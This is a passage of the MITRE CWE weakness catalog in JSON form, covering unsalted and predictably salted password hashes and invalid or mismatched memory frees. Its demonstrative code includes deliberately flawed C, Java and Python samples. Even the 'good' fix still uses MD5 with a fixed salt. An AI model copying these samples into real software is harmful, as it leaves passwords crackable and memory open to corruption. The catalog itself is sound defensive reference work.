or specialized, inexpensive hardware. Offline password cracking can still be effective if the hash function is not expensive to compute; many cryptographic functions are designed to be efficient and can be vulnerable to attacks using massive computing resources, even if the hash is cryptographically strong. The use of a salt only slightly increases the computing requirements for an attacker compared to other strategies such as adaptive hash functions. See CWE-916 for more details."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"916","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Background_Details":{"Background_Detail":"In cryptography, salt refers to some random addition of data to an input before hashing to make dictionary attacks more difficult."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"If an attacker can gain access to the hashes, then the lack of a salt makes it easier to conduct brute force attacks using techniques such as rainbow tables."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-51"},"Phase":"Architecture and Design","Description":{"xhtml:p":["Use an adaptive hash function that can be configured to change the amount of computational effort needed to compute the hash, such as the number of iterations (\\"stretching\\") or the amount of memory required. Some hash functions perform salting automatically. These functions can significantly increase the overhead for a brute force attack compared to intentionally-fast functions such as MD5. For example, rainbow table attacks can become infeasible due to the high computing overhead. Finally, since computing power gets faster and cheaper over time, the technique can be reconfigured to increase the workload without forcing an entire replacement of the algorithm in use.","Some hash functions that have one or more of these desired properties include bcrypt [REF-291], scrypt [REF-292], and PBKDF2 [REF-293]. While there is active debate about which of these is the most effective, they are all stronger than using salts with hash functions with very little computing overhead.","Note that using these functions can have an impact on performance, so they require special consideration to avoid denial-of-service attacks. However, their configurability provides finer control over how much CPU and memory is used, so it could be adjusted to suit the environment\'s needs."]},"Effectiveness":"High"},{"Phase":"Architecture and Design","Description":"If a technique that requires extra computational effort can not be implemented, then for each password that is processed, generate a new random salt using a strong random number generator with unpredictable seeds. Add the salt to the plaintext password before hashing it. When storing the hash, also store the salt. Do not use the same salt for every password.","Effectiveness":"Limited","Effectiveness_Notes":"Be aware that salts will not reduce the workload of a targeted attack against an individual hash (such as the password for a critical person), and in general they are less effective than other hashing techniques such as increasing the computation time or memory overhead. Without a built-in workload, modern attacks can compute large numbers of hashes, or even exhaust the entire space of all possible passwords, within a very short amount of time, using massively-parallel computing and GPU, ASIC, or FPGA hardware."},{"attr":{"@_Mitigation_ID":"MIT-25"},"Phase":["Implementation","Architecture and Design"],"Description":"When using industry-approved techniques, use them correctly. Don\'t cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for preventing common attacks."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-101"},"Intro_Text":"In both of these examples, a user is logged in if their given password matches a stored password:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned char *check_passwd(char *plaintext) {}","xhtml:div":{"#text":"ctext = simple_digest(\\"sha1\\",plaintext,strlen(plaintext), ... );if (equal(ctext, secret_password())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String plainText = new String(plainTextIn);MessageDigest encer = MessageDigest.getInstance(\\"SHA\\");encer.update(plainTextIn);byte[] digest = password.digest();if (equal(digest,secret_password())) {}","xhtml:br":["","","","",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user\'s password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328).  It also does not use a salt (CWE-759)."},{"Intro_Text":"In this example, a new user provides a new username and password to create an account. The program hashes the new user\'s password then stores it in a database.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"def storePassword(userName,Password):","xhtml:div":{"#text":"hasher = hashlib.new(\'md5\')hasher.update(Password)hashedPassword = hasher.digest()return updateUserLogin(userName,hashedPassword)","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""],"xhtml:i":"# UpdateUserLogin returns True on success, False otherwise"}}},{"attr":{"@_Nature":"good","@_Language":"Python"},"xhtml:div":{"#text":"def storePassword(userName,Password):","xhtml:div":{"#text":"hasher = hashlib.new(\'md5\',b\'SaltGoesHere\')hasher.update(Password)hashedPassword = hasher.digest()return updateUserLogin(userName,hashedPassword)","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""],"xhtml:i":"# UpdateUserLogin returns True on success, False otherwise"}}}],"Body_Text":["While it is good to avoid storing a cleartext password, the program does not provide a salt to the hashing function, thus increasing the chances of an attacker being able to reverse the hash and discover the original password if the database is compromised.","Fixing this is as simple as providing a salt to the hashing function on initialization:","Note that regardless of the usage of a salt, the md5 hash is no longer considered secure, so this example still exhibits CWE-327."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-1526","Description":"Router does not use a salt with a hash, making it easier to crack passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1526"},{"Reference":"CVE-2006-1058","Description":"Router does not use a salt with a hash, making it easier to crack passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1058"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-291"}},{"attr":{"@_External_Reference_ID":"REF-292"}},{"attr":{"@_External_Reference_ID":"REF-293","@_Section":"5.2 PBKDF2"}},{"attr":{"@_External_Reference_ID":"REF-294"}},{"attr":{"@_External_Reference_ID":"REF-295"}},{"attr":{"@_External_Reference_ID":"REF-296"}},{"attr":{"@_External_Reference_ID":"REF-297"}},{"attr":{"@_External_Reference_ID":"REF-298"}},{"attr":{"@_External_Reference_ID":"REF-631"}},{"attr":{"@_External_Reference_ID":"REF-632"}},{"attr":{"@_External_Reference_ID":"REF-633"}},{"attr":{"@_External_Reference_ID":"REF-634"}},{"attr":{"@_External_Reference_ID":"REF-635"}},{"attr":{"@_External_Reference_ID":"REF-636"}},{"attr":{"@_External_Reference_ID":"REF-637"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 9, &#34;Creating a Salted Hash&#34; Page 302"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Salt Values&#34;, Page 46"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Description, Potential_Mitigations, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"760":{"attr":{"@_ID":"760","@_Name":"Use of a One-Way Hash with a Predictable Salt","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the software uses a predictable salt as part of the input.","Extended_Description":{"xhtml:p":["This makes it easier for attackers to pre-compute the hash value using dictionary attack techniques such as rainbow tables, effectively disabling the protection that an unpredictable salt would provide.","It should be noted that, despite common perceptions, the use of a good salt with a hash does not sufficiently increase the effort for an attacker who is targeting an individual password, or who has a large amount of computing resources available, such as with cloud-based services or specialized, inexpensive hardware. Offline password cracking can still be effective if the hash function is not expensive to compute; many cryptographic functions are designed to be efficient and can be vulnerable to attacks using massive computing resources, even if the hash is cryptographically strong. The use of a salt only slightly increases the computing requirements for an attacker compared to other strategies such as adaptive hash functions. See CWE-916 for more details."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"916","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Background_Details":{"Background_Detail":"In cryptography, salt refers to some random addition of data to an input before hashing to make dictionary attacks more difficult."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-51"},"Phase":"Architecture and Design","Description":{"xhtml:p":["Use an adaptive hash function that can be configured to change the amount of computational effort needed to compute the hash, such as the number of iterations (\\"stretching\\") or the amount of memory required. Some hash functions perform salting automatically. These functions can significantly increase the overhead for a brute force attack compared to intentionally-fast functions such as MD5. For example, rainbow table attacks can become infeasible due to the high computing overhead. Finally, since computing power gets faster and cheaper over time, the technique can be reconfigured to increase the workload without forcing an entire replacement of the algorithm in use.","Some hash functions that have one or more of these desired properties include bcrypt [REF-291], scrypt [REF-292], and PBKDF2 [REF-293]. While there is active debate about which of these is the most effective, they are all stronger than using salts with hash functions with very little computing overhead.","Note that using these functions can have an impact on performance, so they require special consideration to avoid denial-of-service attacks. However, their configurability provides finer control over how much CPU and memory is used, so it could be adjusted to suit the environment\'s needs."]},"Effectiveness":"High"},{"Phase":"Implementation","Description":"If a technique that requires extra computational effort can not be implemented, then for each password that is processed, generate a new random salt using a strong random number generator with unpredictable seeds. Add the salt to the plaintext password before hashing it. When storing the hash, also store the salt. Do not use the same salt for every password.","Effectiveness":"Limited","Effectiveness_Notes":"Be aware that salts will not reduce the workload of a targeted attack against an individual hash (such as the password for a critical person), and in general they are less effective than other hashing techniques such as increasing the computation time or memory overhead. Without a built-in workload, modern attacks can compute large numbers of hashes, or even exhaust the entire space of all possible passwords, within a very short amount of time, using massively-parallel computing and GPU, ASIC, or FPGA hardware."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-4905","Description":"Blogging software uses a hard-coded salt when calculating a password hash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4905"},{"Reference":"CVE-2002-1657","Description":"Database server uses the username for a salt when encrypting passwords, simplifying brute force attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1657"},{"Reference":"CVE-2001-0967","Description":"Server uses a constant salt when encrypting passwords, simplifying brute force attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0967"},{"Reference":"CVE-2005-0408","Description":"chain: product generates predictable MD5 hashes using a constant value combined with username, allowing authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0408"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-291"}},{"attr":{"@_External_Reference_ID":"REF-292"}},{"attr":{"@_External_Reference_ID":"REF-293","@_Section":"5.2 PBKDF2"}},{"attr":{"@_External_Reference_ID":"REF-294"}},{"attr":{"@_External_Reference_ID":"REF-295"}},{"attr":{"@_External_Reference_ID":"REF-296"}},{"attr":{"@_External_Reference_ID":"REF-297"}},{"attr":{"@_External_Reference_ID":"REF-298"}},{"attr":{"@_External_Reference_ID":"REF-631"}},{"attr":{"@_External_Reference_ID":"REF-632"}},{"attr":{"@_External_Reference_ID":"REF-633"}},{"attr":{"@_External_Reference_ID":"REF-634"}},{"attr":{"@_External_Reference_ID":"REF-635"}},{"attr":{"@_External_Reference_ID":"REF-636"}},{"attr":{"@_External_Reference_ID":"REF-637"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 9, &#34;Creating a Salted Hash&#34; Page 302"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Salt Values&#34;, Page 46"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Description, Potential_Mitigations, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}]}},"761":{"attr":{"@_ID":"761","@_Name":"Free of Pointer not at Start of Buffer","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application calls free() on a pointer to a memory resource that was allocated on the heap, but the pointer is not at the start of the buffer.","Extended_Description":{"xhtml:p":["This can cause the application to crash, or in some cases, modify critical program variables or execute code.","This weakness often occurs when the memory is allocated explicitly on the heap with one of the malloc() family functions and free() is called, but pointer arithmetic has caused the pointer to be in the interior or end of the buffer."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"763","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"When utilizing pointer arithmetic to traverse a buffer, use a separate variable to track progress through memory and preserve the originally allocated address for later freeing."},{"Phase":"Implementation","Description":"When programming in C++, consider using smart pointers provided by the boost library to help correctly and consistently manage memory."},{"attr":{"@_Mitigation_ID":"MIT-4.6"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, glibc in Linux provides protection against free of invalid pointers."]}},{"Phase":"Architecture and Design","Description":"Use a language that provides abstractions for memory allocation and deallocation."},{"Phase":"Testing","Description":"Use a tool that dynamically detects memory management problems, such as valgrind."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-77"},"Intro_Text":"In this example, the programmer dynamically allocates a buffer to hold a string and then searches for a specific character. After completing the search, the programmer attempts to release the allocated memory and return SUCCESS or FAILURE to the caller. Note: for simplification, this example uses a hard-coded \\"Search Me!\\" string and a constant string length of 20.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define SUCCESS (1)#define FAILURE (0)int contains_char(char c){}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *str;str = (char*)malloc(20*sizeof(char));strcpy(str, \\"Search Me!\\");while( *str != NULL){}free(str);return FAILURE;","xhtml:br":["","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( *str == c ){}str = str + 1;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"free(str);return SUCCESS;","xhtml:br":["","",""],"xhtml:i":"/* matched char, free string and return success */"}},"xhtml:br":["","",""],"xhtml:i":"/* didn\'t match yet, increment pointer and try next char */"}},"xhtml:i":"/* we did not match the char in the string, free mem and return failure */"}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"#define SUCCESS (1)#define FAILURE (0)int cointains_char(char c){}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *str;int i = 0;str = (char*)malloc(20*sizeof(char));strcpy(str, \\"Search Me!\\");while( i &lt; strlen(str) ){}free(str);return FAILURE;","xhtml:br":["","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( str[i] == c ){}i = i + 1;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"free(str);return SUCCESS;","xhtml:br":["","",""],"xhtml:i":"/* matched char, free string and return success */"}},"xhtml:br":["","",""],"xhtml:i":"/* didn\'t match yet, increment pointer and try next char */"}},"xhtml:i":"/* we did not match the char in the string, free mem and return failure */"}}}}],"Body_Text":["However, if the character is not at the beginning of the string, or if it is not in the string at all, then the pointer will not be at the start of the buffer when the programmer frees it.","Instead of freeing the pointer in the middle of the buffer, the programmer can use an indexing pointer to step through the memory or abstract the memory calculations by using array indexing."]},{"attr":{"@_Demonstrative_Example_ID":"DX-78"},"Intro_Text":"This code attempts to tokenize a string and place it into an array using the strsep function, which inserts a \\\\0 byte in place of whitespace or a tab character. After finishing the loop, each string in the AP array points to a location within the input string.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char **ap, *argv[10], *inputstring;for (ap = argv; (*ap = strsep(&amp;inputstring, \\" \\\\t\\")) != NULL;)/.../free(ap[4]);","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (**ap != \'\\\\0\')","xhtml:div":{"#text":"if (++ap &gt;= &amp;argv[10])","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"break;","attr":{"@_style":"margin-left:10px;"}}}}}}},"Body_Text":"Since strsep is not allocating any new memory, freeing an element in the middle of the array is equivalent to free a pointer in the middle of inputstring."},{"attr":{"@_Demonstrative_Example_ID":"DX-79"},"Intro_Text":"Consider the following code in the context of a parsing application to extract commands out of user data. The intent is to parse each command and add it to a queue of commands to be executed, discarding each malformed entry.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* input = (char*) malloc(40*sizeof(char));char *tok;char* sep = \\" \\\\t\\";get_user_input( input );tok = strtok( input, sep);while( NULL != tok ){}","xhtml:br":["","","","","","","","","","",""],"xhtml:i":["//hardcode input length for simplicity","/* The following loop will parse and process each token in the input string */"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( isMalformed( tok ) ){}else{}tok = strtok( NULL, sep));","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"free( tok );","xhtml:br":["",""],"xhtml:i":"/* ignore and discard bad data */"}},{"#text":"add_to_command_queue( tok );","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"char* input = (char*) malloc(40*sizeof(char));char *tok, *command;char* sep = \\" \\\\t\\";get_user_input( input );tok = strtok( input, sep);while( NULL != tok ){}free( input )","xhtml:br":["","","","","","","","","","","","",""],"xhtml:i":["//hardcode input length for simplicity","/* The following loop will parse and process each token in the input string */"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( !isMalformed( command ) ){}tok = strtok( NULL, sep));","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"command = (char*) malloc( (strlen(tok) + 1) * sizeof(char) );strcpy( command, tok );add_to_command_queue( command );","xhtml:br":["","","",""],"xhtml:i":"/* copy and enqueue good data */"}},"xhtml:br":""}}}}],"Body_Text":["While the above code attempts to free memory associated with bad commands, since the memory was all allocated in one chunk, it must all be freed together.","One way to fix this problem would be to copy the commands into a new memory location before placing them in the queue. Then, after all commands have been processed, the memory can safely be freed."]}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-11930","Description":"function \\"internally calls \'calloc\' and returns a pointer at an index... inside the allocated buffer. This led to freeing invalid memory.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11930"}},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP12","Entry_Name":"Faulty Memory Release"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-657"}},{"attr":{"@_External_Reference_ID":"REF-480"}}]},"Notes":{"Note":{"#text":"Currently, CWE-763 is the parent, however it may be desirable to have an intermediate parent which is not function-specific, similar to how CWE-762 is an intermediate parent between CWE-763 and CWE-590.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-08"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Observed_Examples"}]}},"762":{"attr":{"@_ID":"762","@_Name":"Mismatched Memory Management Routines","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application attempts to return a memory resource to the system, but it calls a release function that is not compatible with the function that was originally used to allocate that resource.","Extended_Description":{"xhtml:p":["This weakness can be generally described as mismatching memory management routines, such as:","When the memory management functions are mismatched, the consequences may be as severe as code execution, memory corruption, or program crash. Consequences and ease of exploit will vary depending on the implementation of the routines and the object being managed."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["The memory was allocated on the stack (automatically), but it was deallocated using the memory management routine free() (CWE-590), which is intended for explicitly allocated heap memory.","The memory was allocated explicitly using one set of memory management functions, and deallocated using a different set. For example, memory might be allocated with malloc() in C++ instead of the new operator, and then deallocated with the delete 